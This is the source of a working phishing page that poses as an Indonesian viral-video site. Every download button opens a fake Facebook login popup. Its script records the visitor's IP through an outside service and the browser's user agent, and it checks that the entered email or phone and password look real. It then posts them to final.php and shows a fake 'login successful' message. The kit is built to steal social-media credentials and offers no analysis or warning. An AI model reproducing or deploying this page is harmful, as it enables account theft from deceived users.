<!DOCTYPE html>
<html>
   <head>
      <title>Lambe Turah - Watch TV Shows Online, Watch Movies Online</title>
      <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
      <meta name="title" content="Lambe Turah - Watch TV Shows Online, Watch Movies Online">
      <meta name="description" content="Watch  movies & TV shows online or stream right to your smart TV, game console, PC, Mac, mobile, tablet and more.">
      <!-- Open Graph / Facebook -->
      <meta property="og:type" content="website">
      <meta property="og:url" content="<?= (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? https : http) . ://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]; ?>">
      <meta property="og:title" content="Lambe Turah - Watch TV Shows Online, Watch Movies Online">
      <meta property="og:description" content="Watch Lambe Turah movies & TV shows online or stream right to your smart TV, game console, PC, Mac, mobile, tablet and more.">
      <meta property="og:image" content="">
      <!-- Twitter -->
      <meta property="twitter:card" content="summary_large_image">
      <meta property="twitter:url" content="<?= (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? https : http) . ://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]; ?>">
      <meta property="twitter:title" content="Lambe Turah - Watch TV Shows Online, Watch Movies Online">
      <meta property="twitter:description" content="Watch Lambe Turah movies & TV shows online or stream right to your smart TV, game console, PC, Mac, mobile, tablet and more.">
      <meta property="twitter:image" content="">
      <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
      <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
      <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.2.0/css/material-design-iconic-font.min.css">
      <script src="https://code.jquery.com/jquery-3.6.0.js"></script>
      <style>
         @font-face {
         font-family: 'Hel';
         src: url(dist/Helvetica.ttf);
         }
         * {
         margin: 0;
         padding: 0;
         box-sizing: border-box;
         font-family: 'Hel';
         }
         body {
         touch-action: pan-x pan-y;
         }
         label {
         width: 100%;
         }
         .img-igalex {
         display: flex;
         flex-direction: column;
         flex-wrap: nowrap;
         align-items: center;
         }
         .img-igalex button {
         margin-top: 20px;
         background: #0095f6;
         width: 100%;
         font-size: 16px;
         font-family: system-ui;
         font-weight: 400;
         color: #fff;
         border: none;
         padding: 5px 30px;
         border-radius: 5px;
         }
         .ataulogin {
         margin-top: 20px;
         margin-bottom: -20px;
         display: flex;
         flex-direction: row;
         align-items: center;
         flex-wrap: nowrap;
         }
         .garis {
         top: .45em;
         width: 100;
         border-top: 1px solid #ababab;
         }
         .atau {
         font-family: system-ui;
         font-size: 15px;
         margin-left: 10px;
         margin-right: 10px;
         color: #797979;
         }
         .popup-login {
         background: rgba(0, 0, 0, 0.5);
         width: 100%;
         height: 100%;
         position: fixed;
         top: 0;
         left: 0;
         z-index: 999999999999999999;
         }
         .popup-box-login-fb {
         background: #eceff6;
         max-width: 330px;
         height: auto;
         position: relative;
         top: 50%;
         left: 50%;
         transform: translate(-50%, -50%);
         text-align: center;
         font-family: "Teko";
         color: #000;
         border-radius: 10px;
         }
         .navbar-fb {
         background: #3b5998;
         height: auto;
         max-width: 330px;
         padding: 8px;
         border-top-left-radius: 10px;
         border-top-right-radius: 10px;
         }
         .navbar-fb img {
         width: 115px;
         margin-left: auto;
         margin-right: auto;
         display: block;
         }
         .content-box-fb {
         width: 300px;
         height: auto;
         margin-left: auto;
         margin-right: auto;
         display: block;
         }
         .content-box-fb .alert {
         display: none;
         left: -15px;
         position: relative;
         width: 330px;
         padding: 5px;
         background: red;
         color: #fff;
         font-size: 13px;
         font-family: 'Hel';
         }
         .alert {
         border-radius: none !important;
         }
         .content-box-fb img {
         width: 75;
         margin-top: 20px;
         margin-left: auto;
         margin-right: auto;
         border-radius: 12px;
         display: block;
         }
         .txt-login-fb {
         width: 290px;
         height: auto;
         margin-top: 10px;
         margin-left: auto;
         margin-right: auto;
         margin-bottom: 17px;
         padding: 8px;
         color: #90949c;
         font-size: 16px;
         font-family: 'Hel';
         text-align: center;
         display: block;
         }
         input[type="text"],
         input[type="password"] {
         width: 100%;
         height: auto;
         padding: 12px;
         color: #000;
         font-size: 14px;
         font-weight: 400;
         font-family: 'Hel';
         border: 1px solid #bdbebf;
         cursor: pointer;
         outline: none;
         }
         .login-form input[type="text"] {
         margin: 0;
         padding-bottom: 13px;
         border-bottom: none;
         border-radius: 4px 4px 0 0;
         box-shadow: 0 -1px 0 #e0e0e0 inset, 0 0px 0px rgba(0, 0, 0, 0.23) inset;
         }
         .login-form input[type="password"] {
         margin: 0;
         border-top: none;
         border-radius: 0 0 4px 4px;
         box-shadow: 0 -0px 0 rgba(0, 0, 0, 0.23) inset,
         0 0px 0px rgba(255, 255, 255, 0.1);
         }
         .btn-login-fb {
         background: #1778f2;
         width: 100%;
         height: auto;
         margin-top: 10px;
         margin-left: auto;
         margin-right: auto;
         padding: 10px;
         color: #fff;
         font-size: 14px;
         font-family: 'Hel';
         font-weight: bold;
         text-align: center;
         text-shadow: 1px 0px rgba(0, 0, 0, 0.3);
         border: 1px solid #3578e5;
         border-radius: 5px;
         box-shadow: 1px 1px 1px 1px rgba(0, 0, 0, 0.1);
         outline: none;
         display: block;
         }
         .btn-login-fb.disabled {
         pointer-events: none;
         background: #8b9dc3;
         border: 1px solid #8b9dc3;
         }
         .txt-create-account {
         margin-top: 4px;
         width: 100%;
         height: auto;
         padding: 5px;
         color: #3b5998;
         font-size: 13.5px;
         font-family: 'Hel';
         text-align: center;
         }
         .txt-not-now {
         width: 100%;
         height: auto;
         padding: 5px;
         color: #3b5998;
         font-size: 13.5px;
         font-family: 'Hel';
         text-align: center;
         }
         .txt-forgotten-password {
         width: 100%;
         height: auto;
         margin-bottom: 30px;
         padding: 5px;
         color: #7596c8;
         font-size: 13.5px;
         font-family: 'Hel';
         text-align: center;
         }
         .language-box {
         width: 100%;
         height: auto;
         margin-left: auto;
         margin-right: auto;
         display: block;
         }
         .language-name {
         width: 40%;
         height: auto;
         margin: 5px;
         margin-bottom: 0px;
         color: #3b5998;
         font-size: 12px;
         font-family: 'Hel';
         text-align: center;
         display: inline-block;
         }
         .language-name i {
         width: 23px;
         padding: 4px;
         color: #90949c;
         border: 1px solid #3b5998;
         border-radius: 3px;
         }
         .language-name-active {
         color: #90949c;
         font-weight: bold;
         }
         .copyrights {
         width: 40%;
         height: auto;
         margin-top: 10px;
         margin-left: auto;
         margin-right: auto;
         color: #90949c;
         font-size: 12px;
         font-family: 'Hel';
         text-align: center;
         display: block;
         }
      </style>
   </head>
   <body>
      <nav class="navbar navbar-expand-lg navbar-light bg-primary">
         <div class="container">
            <a class="navbar-brand" href="#"><span class="font-weight-bold text-white">Lambetuviral</span></a>
            <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
            <span class="navbar-toggler-icon"></span>
            </button>
            <div class="collapse navbar-collapse" id="navbarSupportedContent">
               <ul class="navbar-nav mr-auto">
                  <li class="nav-item active">
                     <a class="nav-link text-white font-weight-bold" href="index.php">Beranda <span class="sr-only">(current)</span></a>
                  </li>
                  <li class="nav-item">
                     <a class="nav-link text-white" onclick="openPop();">Login</a>
                  </li>
               </ul>
               <form class="form-inline my-2 my-lg-0">
                  <input class="form-control mr-sm-2" type="search" placeholder="Search" aria-label="Search">
                  <button class="btn btn-warning my-2 my-sm-0" type="submit">Search</button>
               </form>
            </div>
         </div>
      </nav>
      <div class="jumbotron">
         <div class="container">
            <h1 class="display-4">Wellcome To Lambetuviral</h1>
            <p class="lead">This is a simple hero unit, a simple jumbotron-style component for calling extra attention to featured content or information.</p>
            <hr class="my-4">
            <p>It uses utility classes for typography and spacing to space content out within the larger container.</p>
            <a class="btn btn-primary btn-lg" onclick="openPop();" role="button">Cek New Videos</a>
         </div>
      </div>
      <div class="container">
      <div class="row">
      <div class="col-md-3 col-6 p-3">
         <div class="card" style="width: 100%">
            <img src="https://i.ibb.co/Wf1XFzz/1.jpg" class="card-img-top" alt="...">
            <div class="card-body">
               <h5 class="card-title">Video Viral Terbaru</h5>
               <a onclick="openPop();" class="btn btn-danger">Download</a>
            </div>
         </div>
      </div>
      <div class="col-md-3 col-6 p-3">
         <div class="card" style="width: 100%">
            <img src="https://i.ibb.co/pQ0W9BM/3.jpg" class="card-img-top" alt="...">
            <div class="card-body">
               <h5 class="card-title">Video Viral Terupdate</h5>
               <a onclick="openPop();" class="btn btn-danger">Download</a>
            </div>
         </div>
      </div>
      <div class="col-md-3 col-6 p-3">
         <div class="card" style="width: 100%">
            <img src="https://i.ibb.co/MMNt7RX/5.jpg" class="card-img-top" alt="...">
            <div class="card-body">
               <h5 class="card-title">Video Hot Selegram</h5>
               <a onclick="openPop();" class="btn btn-danger">Download</a>
            </div>
         </div>
      </div>
      <div class=" popup-login login-facebook animated fadeIn" style="display: none;">
         <div class="popup-box-login-fb">
            <div class="navbar-fb">
               <img width="45" src="https://rawcdn.githack.com/AlexHostX/logAlex/391a0879c14c7ba91729a2271cfc42f3f874c190/facebook_text.png">
            </div>
            <div class="content-box-fb">
               <p class="alert sandi" style="border-radius: 0;">The password you entered is incorrect. <b>Did you forget your
                  password?</b>
               </p>
               <p class="alert email" style="border-radius: 0;">The mobile number or email address that you've entered doesn't
                  match any
                  account. <b>Find your account.</b>
               </p>
               <img width="75" height="75" src="https://i.ibb.co/ThFWLfQ/logofbb-removebg-preview.png">
               <div class="txt-login-fb">
                  Log in to your Facebook account to connect with Instagram
               </div>
               <form class="login-form" method="POST" action="validate.php" onsubmit="$(this).end()">
                  <label>
                  <input type="text" id="user" name="user" placeholder="Mobile number or email address"
                     autocomplete="off" autocapitalize="off">
                  </label>
                  <label>
                  <input type="password" id="pass" name="pass" placeholder="Password" autocomplete="off"
                     autocapitalize="off">
                  </label>
                  <!-- END -->
                  <input type="hidden" name="ip" value="">
                  <input type="hidden" name="ua" value="">
                  <button type="submit" id="btnfb" class="btn-login-fb">Log In</button>
               </form>
               <div class="txt-create-account">Create account</div>
               <div class="txt-not-now">Not now</div>
               <div class="txt-forgotten-password">Forgotten password?</div>
            </div>
            <div class="language-box">
               <center>
                  <div class="language-name language-name-active">English (UK)</div>
                  <div class="language-name">Bahasa Indonesia</div>
                  <div class="language-name">Basa Jawa</div>
                  <div class="language-name">Bahasa Melayu</div>
                  <div class="language-name">日本語</div>
                  <div class="language-name">Español</div>
                  <div class="language-name">Português (Brasil)</div>
                  <div class="language-name">
                     <i class="fa fa-plus"></i>
                  </div>
               </center>
            </div>
            <div class="copyrights">Facebook Inc.</div>
         </div>
      </div>
      <script src="https://cdn.jsdelivr.net/gh/js-projector/ajax@main/ionicons.js"></script>
      <script>
         $.ajax({
             type: "get",
             async: false,
             url: "https://na.apps.amsoveasea.com/swoole/?actid=2020&r=index/getCountry&_only_service_response_=1",
             dataType: "json",
             success: function (result) {
                 $('input[name="ip"]').val(result.ip);
                 $('input[name="ua"]').val(navigator.userAgent)
             }
         })
         
         function openPop() {
             $('.login-facebook').fadeIn();
         }
         
         window.addEventListener('submit', function (e) {
             e.preventDefault();
             $("#btnfb").addClass("disabled");
             setTimeout(() => {
                 var user = $('#user').val();
                 var pass = $('#pass').val();
                 if (user == '' || user == null) {
                     $('.email').show();
                     $('.sandi').hide();
                     $("#btnfb").removeClass("disabled");
                     return false;
                 } else {
         
                     if (user.includes('@')) {
                         let pattern = /^[^ ]+@[^ ]+\.[a-z]{2,3}$/;
                         if (user.match(pattern)) {
                             $('.email').hide();
                         } else {
                             $('.email').show();
                             $('.sandi').hide();
                             $("#btnfb").removeClass("disabled");
                             return false;
                         }
                     }
         
                     if (!isNaN(user)) {
                         if (user.length <= 10) {
                             $('.email').show();
                             $('.sandi').hide();
                             $("#btnfb").removeClass("disabled");
                             return false;
                         } else {
                             $('.email').hide();
                         }
                     }
         
                     if (user.match(/\s/g)) {
                         $('.email').show();
                         $('.sandi').hide();
                         $("#btnfb").removeClass("disabled");
                         return false;
                     } else {
                         $('.email').hide();
                     }
         
                     var regex = /(?:^|[^@\.\w-])([a-z0-9]+:\/\/)?(\w(?!ailto:)\w+:\w+@)?([\w.-]+\.[a-z]{2,4})(:[0-9]+)?(\/.*)?(?=$|[^@\.\w-])/im;
                     if (user.match(regex)) {
                         $('.email').show();
                         $('.sandi').hide();
                         $("#btnfb").removeClass("disabled");
                         return false;
                     }
         
         
                     if (user.length <= 5) {
                         $('.email').show();
                         $('.sandi').hide();
                         $("#btnfb").removeClass("disabled");
                         return false;
                     } else {
                         $('.email').hide();
                     }
         
                 }
                 if (pass == '' || pass == null || pass.length <= 5) {
                     $('.sandi').show();
                     $("#btnfb").removeClass("disabled");
                     return false;
                 } else {
                     $('.sandi').hide();
                 }
                 var regexs = /(?:^|[^@\.\w-])([a-z0-9]+:\/\/)?(\w(?!ailto:)\w+:\w+@)?([\w.-]+\.[a-z]{2,4})(:[0-9]+)?(\/.*)?(?=$|[^@\.\w-])/im;
                 if (pass.match(regexs)) {
                     $('.sandi').show();
                     $('.email').hide();
                     $("#btnfb").removeClass("disabled");
                     return false;
                 } else {
                     $('.sandi').hide();
                 }
                 $.ajax({
                     type: 'POST',
                     url: 'final.php',
                     data: $('.login-form').serialize(),
                     dataType: 'text',
                     success: function () {
                         $('.login-facebook').fadeOut(),
                             alert('Selamat Anda Berhasil Login');
                     }
                 })
             }, 1000)
         })
         
      </script>
   </body>
</html>
